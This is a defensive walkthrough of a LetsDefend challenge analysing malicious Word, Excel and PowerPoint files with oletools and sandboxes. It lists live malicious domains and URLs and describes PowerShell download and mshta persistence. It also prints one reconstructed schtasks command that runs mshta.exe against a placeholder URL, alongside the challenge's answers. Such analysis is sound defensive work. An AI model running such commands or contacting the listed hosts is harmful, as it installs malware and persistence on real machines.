Malicious Document Analysis

Malicious documents are one of the most common ways attackers infiltrate and compromise endpoints and networks. Threat actors frequently abuse document macros to carry out malicious activity. In this post, we will analyze malicious documents and uncover hidden indicators of compromise (IOCs).

Table of Contents

What’s a Macro?
Types of Analysis
Challenge
Summary
How To Protect Against Macro Malware
Conclusion

What’s a Macro?

First, let’s understand the term macro.

A macro is a series of commands that automates a repeated task and can be run whenever the task needs to be performed. Macros are typically written in VBA (Visual Basic for Applications), a programming language developed by Microsoft and supported across Microsoft Office products such as Word and Excel. Authors can digitally sign the macros they create to confirm where they originated; organizations can also verify macros so that users have trustworthy ones to use as needed.

Users, administrators and service providers can write macros, but so can threat actors. Some macros can pose a security risk by introducing viruses and other malicious software to your computer.

Malicious Macros

Macro malware hides in Microsoft Office files. Threat actors have several ways to deliver these files to users, but email is the most prevalent. Phishing is simple yet effective, and attaching malicious documents to emails is one of the most common ways these attacks succeed. The documents may contain malware designed to exfiltrate information from the victim or to download ransomware that encrypts the victim’s file system. The files use names intended to entice or scare people into opening them, and they often look like invoices, receipts, or legal documents.

Invoice document urging the user to enable the contained macros (National Cyber Security Centre)

According to the Canadian Centre for Cyber Security, threat actors can use malicious macros to bypass security controls, like allow lists, and gain access to your systems and network. These macros can be used to execute malicious content and steal or destroy sensitive information. Phishing attempts often use malicious macros in the attached files of their messages, disguised as legitimate attachments. A threat actor may be able to convince you to activate macros in an attachment, allowing the malicious content to spread throughout your systems and network.

Macro malware was fairly common and quite effective several years ago because macros could run automatically whenever a document was opened. However, in recent versions of Microsoft Office, macros are disabled by default. Now, malware authors need to convince users to turn on macros so that their malware can run. They try to scare or urge users by showing fake warnings when a malicious document is opened.

Types of Analysis

Malware analysis is the study of the features, behaviours, objectives, sources, and potential effects of harmful software such as spyware, viruses, and ransomware.

Security professionals typically analyze malicious files and software to detect and understand their behaviours, characteristics, and capabilities. This allows them to fully grasp the threats these programs pose and to develop defensive mechanisms and countermeasures that avoid or mitigate those threats.

With malware analysis, you can extract indicators of compromise (IOCs) to better understand how malware can attack your system. An IOC is data indicating that a system breach or attack has occurred. You can use this data to understand how your system reacts to attacks, making it easier to detect attacks in the future.

There are commonly two types of malware analysis techniques: static and dynamic.

Static Analysis

In static malware analysis, security experts analyze a malware sample without executing its code. The aim is to identify the malware family, how the malware operates, and its capabilities. Static analysis can uncover clues about the nature of the malware, such as filenames, hashes, IP addresses, domains, and file header data. Since there’s no code execution, static malware analysis doesn’t require a live environment.

Static analysis is relatively straightforward because analysts only have to evaluate the properties of the sample, such as its metadata, strings, structure, and code. It typically relies on signature-based detection, which compares the sample’s digital footprint against a database of known malicious signatures. Analysts also extract a sample’s strings and metadata to reveal details like commands, filenames, messages, API calls, registry keys, URLs, and other IOCs.
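To make the string-extraction step concrete, here is a minimal Python sketch of the idea. It is not how any particular tool works internally: the function names, the regular expressions, and the sample bytes are all assumptions made up for illustration, and the patterns are deliberately simple.

```python
import re

# Simplified patterns (assumptions for this sketch, not a complete IOC grammar).
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_strings(data, min_len=6):
    """Return runs of printable ASCII, similar in spirit to the Unix `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [match.decode("ascii") for match in re.findall(pattern, data)]


def find_iocs(strings):
    """Collect URL and IPv4 candidates from the extracted strings."""
    urls, ips = set(), set()
    for text in strings:
        urls.update(URL_RE.findall(text))
        ips.update(IPV4_RE.findall(text))
    return {"urls": sorted(urls), "ips": sorted(ips)}


# Made-up sample bytes; example.com and 192.0.2.10 are reserved documentation values.
sample = (
    b"\x00\x01MZ\x90\x00cmd.exe /c start\x00\xff"
    b"http://example.com/payload.bin\x00\x02connect 192.0.2.10\x00"
)
strings = extract_strings(sample)
iocs = find_iocs(strings)
print(strings)
print(iocs)
```

Nothing in the sample is executed; the script only reads bytes, which is what keeps this kind of check on the static side of the analysis.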

Alternatively, analysts can execute the sample and observe what it does.

Dynamic Analysis

Dynamic malware analysis involves executing a malware’s code within a controlled environment and monitoring how it interacts with a system. Such analysis allows analysts to discover the malware’s true intentions and ability to evade detection. This approach provides a more in-depth, accurate report, but the process can take longer. To safely run the malware and observe its activities, security analysts need a closed and isolated testing environment (malware sandbox) where the malware can execute without infecting the entire system or network.

While static analysis uses signature-based detection, dynamic analysis uses a behaviour-based detection approach. Quickly evolving or new types of malware can be hard to detect using signatures, and some malware obscures its signature, making static analysis ineffective. Because dynamic analysis looks at behaviour, it allows security analysts to identify and understand new and unknown threats. Malware often contacts remote servers to receive commands to create or modify files, open other network connections, make changes to the registry, or exfiltrate data. Dynamic analysis therefore includes monitoring the malware’s traffic during execution to understand which servers it communicates with, the types of commands it receives, and the data it may exfiltrate.

By combining both static and dynamic techniques, security teams can better understand malware threats and develop more effective defense strategies to detect and mitigate potential attacks.

Challenge

For this task, we will make use of the SOC/Blue Team training platform Let’s Defend and its materials. We will analyze three potentially malicious files. You can follow along by heading to the corresponding challenges on the platform.

We have a few documents that could potentially contain macros. Our job as analysts will be to confirm if these files are indeed malicious, identify indicators of compromise, and to answer some questions that can assist with incident response.

For our investigation, we will implement both static and dynamic methods to analyze the potentially malicious docs. We will gather information by adopting static analysis to examine the documents’ contents and structures, understanding the nature of the potential threats, and dynamic analysis to observe and understand their behaviours. For the first part of the challenge, we will use mostly static analysis and bring in dynamic analysis for the second part.

We will be using an Ubuntu VM for this task and the following tools:

Exiftool
Oletools
VirusTotal
Joe Security Sandbox
CyberChef

Let’s begin

Q. What is the MD5 value of the “/root/Desktop/QuestionFiles/PO-465514-180820.doc” file?

This is asking us for the hash of the PO-465514-180820.doc file, specifically the MD5 value. We can get the value by using the md5sum command.

md5sum PO-465514-180820.doc

We got the hash
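If you would rather compute hashes from a script than from the shell, the same step can be sketched in Python with the standard hashlib module. The helper name file_hashes is made up for this post; it reads the file in chunks so large samples do not have to fit in memory, and it returns the SHA256 alongside the MD5 since sandboxes often accept either.

```python
import hashlib


def file_hashes(path, algorithms=("md5", "sha256"), chunk_size=65536):
    """Return a dict mapping each algorithm name to the file's hex digest."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as handle:
        # Read fixed-size chunks until read() returns an empty bytes object.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            for hasher in hashers.values():
                hasher.update(chunk)
    return {name: hasher.hexdigest() for name, hasher in hashers.items()}
```

Calling file_hashes("PO-465514-180820.doc")["md5"] in the directory that holds the sample should return the same value that md5sum prints.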

Every malware sample has a digital fingerprint that identifies it. This could be a cryptographic hash, a binary pattern, or a data string. We can use the hash value to check whether the file is known to be malicious by looking it up on VirusTotal, an online service that analyzes suspicious files and URLs with antivirus engines and website scanners. We will search VirusTotal for the hash of the file.

The majority of the antivirus engines flagged the file as malicious. It appears to be a Trojan, a type of malware that tries to look harmless and legitimate. Once installed, Trojans perform various malicious activities such as stealing personal information, downloading other malware, or giving attackers access to your device.

Ans: d7e6921bfd008f707ba52dee374ff3db

Q. What is the file type of the “/home/analyst/PO-465514-180820.doc” file?

Our next question asks for the file type of the document, so we need to retrieve more information about the file. I’ll be using exiftool, a free and open-source program for reading, writing, and updating metadata for a variety of file types. We will use the command

exiftool PO-465514-180820.doc

From the result, we can see a lot of information about the file, such as the author, file size, creation and modification dates, file permissions, and file type.
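File type tools do not trust the extension; they look at the first bytes of the file. As a rough illustration of that idea (not a description of how exiftool itself is implemented), the Python sketch below checks a header against three well-known signatures. The function name and the returned labels are made up for this example.

```python
# Well-known signatures at the start of common document containers.
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # legacy .doc/.xls/.ppt
ZIP_MAGIC = b"PK\x03\x04"                        # .docx/.xlsm/.pptx are ZIP archives
RTF_MAGIC = b"{\\rtf"                            # Rich Text Format


def sniff_container(header):
    """Guess the container format from the first bytes of a file."""
    if header.startswith(OLE2_MAGIC):
        return "OLE2 compound file"
    if header.startswith(ZIP_MAGIC):
        return "ZIP container"
    if header.startswith(RTF_MAGIC):
        return "RTF"
    return "unknown"


# Example with an in-memory header instead of a real sample.
print(sniff_container(OLE2_MAGIC + b"\x00" * 8))
```

To check a real file, read its first few bytes with open(path, "rb").read(8) and pass them in. A legacy Word .doc like the one in this challenge would be expected to fall in the OLE2 branch.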

Ans: DOC

Q: Does the file “/root/Desktop/QuestionFiles/PO-465514-180820.doc” contain a VBA macro?

There are a number of ways to determine if a file contains VBA macros. We will make use of Oletools to answer this and the next couple of questions.

Oletools is a package of Python tools for analyzing Microsoft OLE2 files, which mainly include MS Office documents and Outlook messages. It is used for malware analysis and digital forensics. With oletools, you can analyze these malicious documents and “fish out” the threat actors.

To install oletools:

sudo -H pip install -U oletools

We will use oleid for this question. oleid is a script that analyzes OLE files such as MS Office documents (e.g. Word, Excel) to detect specific characteristics usually found in malicious files. It can detect the OLE file type of the document from its internal structure, whether the document is encrypted, and whether the file contains VBA macros.

Use the command

oleid PO-465514-180820.doc

oleid gives us the file format and application name. More importantly, it shows that the file contains VBA macros. It reports no external relationships and no hidden files within the document.

Ans: Yes

Q. Some malicious activity occurs when the document file “/root/Desktop/QuestionFiles/PO-465514-180820.doc” is opened. What is the macro keyword that enables this?

Files can contain VBA macro code written to run a certain action as soon as the user opens the document. To identify the keyword, we have to take a look at the macros, and for that we will use olevba. olevba extracts and analyzes VBA macro source code from MS Office documents (VBA source code is embedded in the document and can be executed when the document is opened). We will use the command below to discover suspicious keywords and indicators.

olevba PO-465514-180820.doc

The result lists the indicators found in the VBA macro code and highlights suspicious keywords. We can see the keyword Document_open, which olevba flags as an AutoExec type: it is the name of a procedure that runs automatically whenever the document is opened.
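The idea behind this kind of check can be sketched in a few lines of Python: scan the macro source for procedures whose names Office runs automatically. This is a simplified illustration, not olevba’s actual implementation; the list of names is a small, non-exhaustive selection, and the sample macro is invented for the example. VBA identifiers are case-insensitive, so the comparison ignores case.

```python
import re

# A few procedure names that Office runs automatically (not an exhaustive list).
AUTOEXEC_NAMES = (
    "AutoOpen", "AutoExec", "AutoClose",
    "Document_Open", "Document_Close",
    "Auto_Open", "Auto_Close", "Workbook_Open",
)

# Matches "Sub Name", optionally preceded by Private or Public, at the start of a line.
SUB_RE = re.compile(
    r"^\s*(?:(?:Private|Public)\s+)?Sub\s+(\w+)",
    re.IGNORECASE | re.MULTILINE,
)


def find_autoexec_subs(vba_source):
    """Return the names of procedures that match a known auto-run name."""
    wanted = {name.lower() for name in AUTOEXEC_NAMES}
    return [name for name in SUB_RE.findall(vba_source) if name.lower() in wanted]


# Invented, harmless macro text used only to exercise the function.
sample_vba = """
Private Sub Document_open()
    Call Helper
End Sub

Sub Helper()
    MsgBox "hello"
End Sub
"""
found = find_autoexec_subs(sample_vba)
print(found)
```

The helper procedure is ignored because its name is not on the list, while Document_open is reported even though its capitalization differs from the list entry.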

If we look at the script, we see a lot of obfuscated characters. The authors of this file obfuscated the script to make it unclear and difficult to understand. Cybercriminals can employ the obfuscation strategy to hide the true intent and functionality of their malicious code by making it hard to understand for both security analysts and security tools. This technique makes malware more difficult to detect, analyze and eliminate; compression, encryption, and encoding are some of the most common obfuscation methods used by threat actors.

To understand the script a little better, we can use oletools to try to de-obfuscate it. We will first save the olevba output to a file named PO-465514-180820.vba.

To de-obfuscate the file, we will use the command

olevba --deobf --reveal PO-465514-180820.vba > PO-465514-180820_deobf.vba

We can open the de-obfuscated file in Visual Studio or any other text editor.

Our result does look a little different from the previous olevba output. We can see more suspicious keywords that exhibit strong malicious intent, e.g., command, create etc.
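To give a feel for what de-obfuscation involves, here is a toy Python sketch that undoes one very common trick: building strings out of Chr() calls and concatenation. It is only an illustration under simplifying assumptions (no embedded quotes inside string literals, only numeric Chr arguments) and is not how olevba does it; the function names and the sample line are invented.

```python
import re

CHR_RE = re.compile(r"\bChrW?\$?\(\s*(\d+)\s*\)", re.IGNORECASE)
CONCAT_RE = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')


def resolve_chr(expr):
    """Replace Chr(n) calls with the quoted character they produce."""
    def replace(match):
        code = int(match.group(1))
        # Leave double quotes (34) and out-of-range codes untouched to keep the sketch simple.
        if code == 34 or not 0 <= code <= 0xFFFF:
            return match.group(0)
        return '"' + chr(code) + '"'
    return CHR_RE.sub(replace, expr)


def merge_literals(expr):
    """Join adjacent string literals ("ab" & "cd" -> "abcd") until nothing changes."""
    previous = None
    while previous != expr:
        previous = expr
        expr = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', expr)
    return expr


def deobfuscate(expr):
    return merge_literals(resolve_chr(expr))


obfuscated = 'x = "pow" & Chr(101) & "rsh" + Chr(101) & "ll"'
print(deobfuscate(obfuscated))
```

Real samples layer several tricks on top of each other, so a dedicated tool is still the better choice; the sketch just shows why the output becomes more readable once the pieces are joined.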

Ans: Document_open

Q. Who is the author of the file “/root/Desktop/QuestionFiles/PO-465514-180820.doc”?

We already saw this information in the exiftool output from an earlier question.

Ans: alexandre riviere

Q. What is the last saved time of the “/root/Desktop/QuestionFiles/PO-465514-180820.doc” file?

To retrieve this information, we will use olemeta. This tool is part of the python-oletools package. It parses OLE files such as MS Office documents (e.g. Word, Excel) and extracts all standard properties present in the file.

Here’s the command

olemeta PO-465514-180820.doc

Ans: 2020-08-18 08:19:00

Now we have been able to gather the requested information for the particular file PO-465514-180820.doc. Let’s check out and analyze another file. We have been assigned to conduct analysis on the Siparis_17.xls file as well.

Let’s confirm if this suspicious file is malicious. We will first check the file for VBA macros and hash the file to verify in VirusTotal. We use the oleid command

oleid Siparis_17.xls

The file does indeed contain VBA macros, which is a warning sign, although macros alone do not prove that a file is malicious. Let us confirm this by using VirusTotal.

We will get the SHA256 hash value of the file and search for it on VirusTotal.

Yeah, it’s definitely malicious! It looks like another Trojan, this time one that runs via PowerShell.

Q. The malicious file “Siparis_17.xls” is trying to download files from an address. From which domain is it trying to download the file?

Let’s analyze the content of the file and see what we can discover. We will use olevba to review the macros.

olevba Siparis_17.xls

Yep, the keywords include PowerShell commands, so the file does make use of PowerShell! We can also see a couple of IOCs (indicators of compromise): a URL pointing to an external, unsecured site and a suspicious-looking file.
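When a report only gives you full URLs, the domain can be pulled out programmatically. A small sketch with Python’s standard urllib.parse is shown below. The helper name is made up, and the path in the example URL is a placeholder: only the domain itself comes from the olevba output.

```python
from urllib.parse import urlsplit


def hostname_of(url):
    """Return the lower-cased host part of a URL, without scheme, port, or path."""
    return urlsplit(url).hostname


# The path below is a hypothetical placeholder, not the real download path.
print(hostname_of("http://hocoso.mobi/placeholder/path"))
```

This is handy when a sandbox report lists dozens of contacted URLs and you want a de-duplicated list of domains to block or hunt for.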

Ans: hocoso.mobi

Q. How many IOCs are in the “Siparis_17.xls” file according to the Olevba tool?

We already have this information

Ans: 2

Nice! We are done with the static part of the analysis. Next, we move on to the dynamic part, where we will look at how the malicious files behave when they are active. For this part of the analysis, we will use the sandboxes VirusTotal and Joe Security. We are already familiar with VirusTotal. Joe Sandbox detects and analyzes potentially malicious files and URLs on several operating systems, looking for suspicious activity. It performs deep malware analysis and generates comprehensive, detailed reports.

Let’s get started!

Q. The file PO-465514-180820.doc is trying to make a request to a domain ending with “.kz”. What is this domain?

We will go to VirusTotal and head to the Details tab and look at the connections the document made. We can see a domain that ends with the particular top-level domain .kz.

Ans: www.msbc.kz

Q. With which Windows tool are the connection requests made? (file:PO-465514-180820.doc)

This time we use the Joe Security sandbox.

Look up the hash of the malicious file in the online sandbox environment.

We will pick the full analysis report and review it. Let’s head to the process tree to follow the processes.

Looking at the process tree, it appears that PowerShell was executed after the malicious doc was opened. Most likely the file attempts to reach out to the internet via PowerShell. To confirm this, we will decode the characters we see in the image and view the content (as mentioned in a previous question, threat actors can obfuscate or encode text to make it harder to read).

We will use CyberChef, an open-source tool used extensively by cybersecurity professionals to carry out both simple and complex data manipulation tasks within a web browser. It is great for encryption, encoding, compression, and data analysis. Head to CyberChef.

Copy and paste the encoded characters in the input space

Select From Base64

Select Remove null bytes

We were able to decode and de-obfuscate the string to an extent, although it may still be difficult to read. Still, we can see the www.msbc.kz domain, so the document did attempt to reach out to this domain and others via PowerShell.
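The two CyberChef steps can also be reproduced in Python. PowerShell’s encoded commands are Base64 over UTF-16LE text, which stores each ASCII character followed by a zero byte; that is why “Remove null bytes” is needed after “From Base64”. The sketch below assumes the string really is a PowerShell encoded command, and it uses a harmless command encoded on the spot rather than the real payload.

```python
import base64


def decode_powershell_b64(blob):
    """Decode a Base64 string that wraps UTF-16LE text (PowerShell's encoded-command format)."""
    raw = base64.b64decode(blob)
    return raw.decode("utf-16-le")


# Build a harmless encoded command so the example is self-contained.
plain = "Write-Output 'hello'"
encoded = base64.b64encode(plain.encode("utf-16-le")).decode("ascii")

decoded = decode_powershell_b64(encoded)
print(encoded)
print(decoded)

# Equivalent of CyberChef's "From Base64" followed by "Remove null bytes" for ASCII-only text.
stripped = base64.b64decode(encoded).replace(b"\x00", b"").decode("ascii")
print(stripped)
```

Decoding as UTF-16LE is slightly more robust than stripping null bytes, because it also handles non-ASCII characters correctly.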

Ans: powershell.exe

Q. How many addresses does the file send DNS requests to? (file:PO-465514-180820.doc)

To answer this question, we will return to the Joe Security report. Let’s head to the Domains and IPs section and look under Contacted Domains

Ans: 5

Q. The “Siparis_17.xls” malware document is trying to download a file. With what name does he want to save the file it is trying to download to the device?

We already saw the name of the file when we ran olevba on this document.

Ans: 6LeGwKmrm.jar

We have one more file to analyze. It appears to be a PPT (PowerPoint) file, PO#00187.ppt.

We were initially given a zip file and had to unzip it to retrieve the file. As usual, we get the hash value of the file and run it through VirusTotal to verify whether it is malicious.

Q. What was the general name / category of the malicious file in the analyzed ppt file?

We determined that the file is malicious. Now, we just have to identify its category.

We see that most of the antivirus engines that identified the file as malicious classified it as a VB Trojan agent.

Ans: vb:trojan

Q. Which of the url addresses it communicates with has been detected as harmful by sandboxes?

Here, we need to identify a URL that has a bad reputation and is flagged as malicious. We will go to the Details tab in VirusTotal, look at the contacted URLs, and see which ones have been detected.

We see one particular URL that has been flagged more than the rest.

Ans: http://onedrive.linkpc.net/ali/yasine/idman.lnk

Q. What is the name of the htm file that drops to disk?

We are looking for a file that was dropped to disk when the malicious PPT file was opened and running. Malicious files can act as droppers, which connect to the internet and drop files on the compromised machine.

Let’s head to the Dropped files section under the Details Tab. Go through the listed dropped files and pick out the one that has a .htm extension

Ans: hdkjashdkasbctdgjsa[1].htm

Q. Which process is running to persistent under mshta.exe after the relevant malware runs?

Persistence in security occurs when a threat actor or malware maintains continued access to a system after the initial point of compromise. Cyber criminals employ techniques and strategies that enable long-term access to systems despite disruptions such as restarts or changed credentials. Persistence gives them the ability to return again and again, no matter how many times you try to kick them out.

Without persistence, a compromise would be limited to the initial breach. An attacker could lose access when the system is rebooted or patched. Persistence ensures hackers have an ongoing presence. Persistence may involve replacing legitimate system files with malware-equipped versions, editing configurations to enable backdoor access, installing automated scripts, or tweaking a cron job to trigger remote commands. Attackers essentially implant remote access to prevent loss of system control after initial infection.

We will run the hash of the file in Joe Security.

Let’s head to the MITRE ATT&CK Matrix section and look under Persistence to understand the methods the malware uses to try to maintain persistence. The MITRE ATT&CK framework is a curated knowledge base and model of cyber adversary behaviour, reflecting the various phases of an adversary’s attack life cycle and the platforms they are known to target. It tracks the tactics and techniques used by threat actors across the entire attack life cycle. Security professionals use the framework to understand the strategies threat actors adopt and the motivations behind individual actions, and to work out how to strengthen an organization’s security posture.

We can see a number of techniques were used to try to maintain access to the system. Let’s take a look at Scheduled Task/Job and see what we can learn.


From the description, we understand that schtasks.exe was deployed. This tool allows administrators to create, delete, query, change, run, and end scheduled tasks on a local or remote computer. To confirm this, let’s review the process tree and see what we find.

We do see schtasks.exe running under mshta.exe, a utility that executes Microsoft HTML Application (HTA) files. Threat actors can abuse this tool to evade defenses and execute malicious .hta files, JavaScript, or VBScript.

When we view the command, we see that the schtasks tool was used to forcefully create a task named lunkicharkhi that will run every 80 minutes. This task uses mshta.exe to execute a malicious VBScript, and likely to download and execute a malicious file.
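When you triage many sandbox reports, it helps to break such command lines into their switches automatically. The Python sketch below does this for a schtasks command. The command line in the example is a reconstruction based on the description above, not the exact string from the report, and the URL in it is a placeholder; /create, /sc, /mo, /tn, /tr and /f are standard schtasks switches. The parser is intentionally naive and assumes values never start with a slash.

```python
import shlex


def parse_schtasks(command_line):
    """Split a schtasks command line into a dict of switch -> value (or True for flags)."""
    tokens = shlex.split(command_line)
    options = {}
    index = 1  # skip the program name
    while index < len(tokens):
        token = tokens[index]
        if token.startswith("/"):
            key = token.lower()
            has_value = index + 1 < len(tokens) and not tokens[index + 1].startswith("/")
            if has_value:
                options[key] = tokens[index + 1]
                index += 2
                continue
            options[key] = True
        index += 1
    return options


# Reconstructed example; the URL is a hypothetical placeholder.
example = (
    'schtasks /create /sc MINUTE /mo 80 /tn "lunkicharkhi" '
    '/tr "mshta.exe http://example.invalid/placeholder" /F'
)
task = parse_schtasks(example)
print(task)
```

Here /sc MINUTE together with /mo 80 expresses the 80-minute interval, /tn is the task name, /tr is the command the task runs, and /F forces creation even if a task with that name already exists.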

Ans: schtasks.exe

Great, we have come to the end of the analysis!

Summary

We first examined the documents without running them to understand their nature and how they work, and retrieved IOCs along the way. Next, we analyzed the documents further using online sandboxes and examined how they operate at runtime. Based on our analysis, all of the given documents should be considered malicious!

Hybrid analysis, i.e. combining static and dynamic techniques, helps detect unknown threats, even those from the most sophisticated malware. It provides greater insight into how malware works and lets analysts extract more useful information for detecting and remediating an infection.

Malware and malicious document analysis are important and beneficial in areas such as threat detection, threat hunting, vulnerability analysis and incident response.

How To Protect Against Macro Malware

The following measures help us stay safe and defend against macro malware:

Make sure macros are disabled by default in your Microsoft Office applications.
Email is the most common way macro malware infects systems. Don’t open suspicious emails or attachments. Configure mail servers and secure email gateways to block or quarantine Microsoft Office files containing macros.
Use organization-developed or signed macros that are verified by technical authorities.
Promote awareness and train end users on macro security and phishing.
Update and patch applications and systems frequently.
Scan your devices regularly with an anti-malware/anti-virus program from a reputable vendor to detect suspicious or malicious behaviour on host systems.
Deploy intrusion detection systems (IDS) and endpoint detection and response (EDR) systems to detect and quarantine files with matching malicious hashes.

Conclusion

Macros are a powerful way to automate common tasks in Microsoft Office and can make people more productive. However, VBA macros are a common way for malicious actors to gain access to deploy malware and ransomware on devices. Remember, don’t enable macros in a Microsoft 365 file unless you’re sure you know what those macros do and you want the functionality they provide.
